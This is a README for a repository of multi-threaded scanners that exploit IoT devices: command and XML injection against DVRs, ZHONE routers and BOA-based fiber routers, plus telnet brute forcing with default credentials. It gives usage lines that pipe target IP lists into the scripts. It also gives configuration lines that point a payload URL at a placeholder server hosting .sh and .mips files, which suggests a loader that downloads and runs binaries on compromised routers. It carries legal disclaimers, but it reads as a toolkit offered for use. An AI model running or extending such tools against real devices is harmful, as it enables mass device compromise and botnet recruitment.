A collection of tools for network security assessment, designed to identify vulnerabilities in various devices. For educational purposes and authorized security testing only.
These tools were developed exclusively for legitimate security research, educational purposes, and authorized security testing. Unauthorized use against systems you do not own or do not have explicit permission to test is illegal and unethical.
Misuse of these tools may result in:
- Legal consequences
- Criminal charges
- Civil liability
This repository contains several network scanners targeting different vulnerabilities in devices:
- DVR Scanner (
dvr.py
): Tests DVR devices for XML injection vulnerabilities - ZHONE Router Scanner (
zhone.py
): Tests ZHONE routers for command injection vulnerabilities - Telnet Brute Force (
brute.py
): Tests common telnet credentials on network devices - Fiber Router Scanner (
fiber.py
): Tests fiber routers with BOA web server for vulnerabilities
Before using these tools, you need to configure the payload URLs to point to your own servers. Never use these tools maliciously or against unauthorized targets.
Each script contains a payload URL that needs to be modified to point to your controlled testing environment:
# DVR Scanner Example
PAYLOAD_URL = "http://YOUR_SERVER_IP/YOUR_TEST_FILE.sh"
PAYLOAD_NAME = "YOUR_TEST_FILE.sh"
# ZHONE Router Scanner Example
PAYLOAD = "http://YOUR_SERVER_IP/YOUR_TEST_FILE.mips"
Replace these URLs with the address of your own server where you host harmless test files to verify the vulnerabilities.
cat target_ip_list.txt | python3 dvr.py 80
cat target_ip_list.txt | python3 zhone.py 80
python3 bruter.py targets.txt 50 success.txt
cat target_ip_list.txt | python3 fiber.py 80
Each tool includes:
- Multi-threaded scanning capability
- Real-time status updates
- Automated credential testing against common default passwords
- Vulnerability validation
- Tests DVR devices for XML injection vulnerabilities in the NTP configuration
- Supports multiple authentication methods
- Attempts to clean settings after tests
- Tests ZHONE routers for command injection in the ping functionality
- Uses session-based authentication
- Tests an extensive list of common credentials for IoT and network devices
- Handles connection timeouts
- Tracks successful attempts in real-time
- Tests fiber routers using BOA web server for command injection
- Exploits vulnerabilities in the traceroute functionality
Each tool provides real-time status updates in the console:
- Number of connection attempts
- Number of discovered devices
- Number of successful logins
- Number of confirmed vulnerabilities
These tools are provided "as is" with no warranty of any kind. Using these tools to attack targets without prior mutual consent is illegal. It is the end user's responsibility to comply with all applicable local, state, national, and international laws.
The developers assume no responsibility and are not liable for any misuse or damage caused by this software.
Contributions to improve security research tools are welcome, especially those that:
- Improve security checks
- Add documentation
- Enhance code quality
- Add responsible disclosure capabilities
These tools were created by @CirqueiraDev
Feel free to follow me on Instagram 😄
- Discord: Cirqueira
- My Instagram
Remember: With great power comes great responsibility. Use these tools ethically and legally.